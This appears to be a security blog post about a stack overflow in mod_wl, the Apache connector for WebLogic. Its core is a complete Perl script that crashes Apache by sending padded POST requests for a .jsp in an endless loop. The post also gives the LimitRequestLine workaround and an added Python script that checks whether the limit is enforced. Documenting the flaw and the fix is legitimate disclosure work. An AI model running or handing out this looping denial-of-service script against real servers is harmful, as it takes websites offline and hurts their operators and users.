This post was delayed in release due to sensitivity.

This vulnerability was a pretty fun one, just because it affected so many people and was so simple to trigger.

This vulnerability is your standard stack-based overflow. This particular overflow occurs in mod_wl, the WebLogic connector (plug-in) for Apache, and is triggered by sending a POST request for a .jsp with a long request line (the padding in the script below lands in the request line, which is what the LimitRequestLine workaround later caps). I started to look at KingCope's code, but it just didn't seem to work in my environment. So, based on his DoS code, I wrote the one below to test with; nothing fancy.

use IO::Socket;
use strict;
use warnings;

my $host = $ARGV[0];
my $port = $ARGV[1];
die "usage: $0 <host> <port>\n" unless defined $host and defined $port;

my $dos = 0;

while (1) {

    if ($dos == 1) {
        print "Server is down\n";
        exit;
    }

    # 8000 bytes of padding in the request line: the line is 8016 bytes, which
    # stays under Apache's default LimitRequestLine of 8190, so Apache passes
    # it on to mod_wl instead of rejecting it.
    my $pad = "A" x 8000;
    my $sock = IO::Socket::INET->new(PeerAddr => $host,
                                     PeerPort => $port,
                                     Proto    => 'tcp');
    unless ($sock) {
        # connection refused: the listener itself is gone
        print "Server is down\n";
        exit;
    }
    print $sock "POST /index.jsp $pad\r\n\r\nHost: localhost\r\n\r\n";

    # Read the start of the reply; a live Apache answers with a Server header,
    # a crashed child closes the connection with nothing sent.
    my $resp = '';
    read($sock, $resp, 100);
    print "=>" . $resp . "<=\n\n";
    if ($resp !~ /Server/) {
        $dos = 1;
    }
    close($sock);
}

The code above will segfault Apache. The endless loop is needed because Apache recovers so quickly (the parent process respawns a child that dies), and it was an easy way to perform the DoS; it took a couple of minutes. I have not had much time, but I would like to explore this further and start debugging to see whether code can be executed in a Linux environment.

Fix:
After all of my testing, the workaround recommended by Oracle does work. They have not released a patch at this time.

With the workaround in place I even tried the DoS by sending a 3999-byte POST so as not to trigger LimitRequestLine. Apache handled the large, repeated requests like a champ.

Workaround in the Apache conf:
LimitRequestLine 4000
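To check whether the workaround is actually in place on a server, it helps to separate the two outcomes the Perl script lumps together: no reply at all (a child died) versus a 414 from Apache rejecting the request line. The script below is an added example in Python, not the post's own Perl script; it builds the same padded POST, works out the request-line length that LimitRequestLine counts (method, URI and everything up to the first CRLF, so the padding that fits under 4000 is the limit minus the fixed "POST /index.jsp " prefix), and classifies the reply. The path /index.jsp, the host name and the limit values are assumptions taken from the post's script and workaround; the probe function itself needs a live target and is not exercised offline.

```python
import socket

# Assumptions for illustration, not from the original post's code:
# the .jsp the Perl script targets and the workaround value the post gives.
TARGET_PATH = "/index.jsp"
WORKAROUND_LIMIT = 4000      # LimitRequestLine 4000
APACHE_DEFAULT_LIMIT = 8190  # Apache's compiled-in LimitRequestLine default


def build_request(pad_len, path=TARGET_PATH, host="localhost"):
    """Build the same request shape as the Perl script: a POST whose request
    line is padded with pad_len 'A' bytes after the path, then a Host header."""
    request_line = b"POST " + path.encode("ascii") + b" " + b"A" * pad_len
    return request_line + b"\r\n\r\nHost: " + host.encode("ascii") + b"\r\n\r\n"


def request_line_length(raw):
    """Bytes in the request line, i.e. what LimitRequestLine counts:
    everything up to the first CRLF."""
    return raw.index(b"\r\n")


def max_padding_under_limit(limit, path=TARGET_PATH):
    """Largest pad_len whose request line does not exceed `limit` bytes."""
    return limit - len("POST " + path + " ")


def classify_response(raw):
    """Classify what came back from one padded request:
       'no_response'    -> connection closed with nothing sent (child crashed)
       'limit_enforced' -> 414, the request line exceeded LimitRequestLine
       'served'         -> any other HTTP status line (request reached mod_wl)
       'malformed'      -> bytes that are not an HTTP status line"""
    if not raw:
        return "no_response"
    status_line = raw.split(b"\r\n", 1)[0]
    parts = status_line.split(b" ")
    if len(parts) < 2 or not parts[0].startswith(b"HTTP/"):
        return "malformed"
    if parts[1] == b"414":
        return "limit_enforced"
    return "served"


def probe(host, port, pad_len, timeout=5.0):
    """Send one padded POST to a live target and classify the reply."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_request(pad_len))
        try:
            data = sock.recv(4096)
        except socket.timeout:
            data = b""
    return classify_response(data)


if __name__ == "__main__":
    import sys
    host, port = sys.argv[1], int(sys.argv[2])
    # 8000: the Perl script's padding, under the 8190 default but over the
    # 4000 workaround. 3984: the most padding that still fits under 4000.
    for pad in (8000, max_padding_under_limit(WORKAROUND_LIMIT)):
        raw = build_request(pad)
        print(pad, request_line_length(raw), probe(host, port, pad))
```

With LimitRequestLine 4000 active, the 8000-byte padding should come back as limit_enforced rather than no_response; the 3984-byte padding is the one that still reaches mod_wl, so that is the request to repeat when checking that the server stays up.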

References:
http://www.milw0rm.com
http://cve.mitre.org
http://www.frsirt.com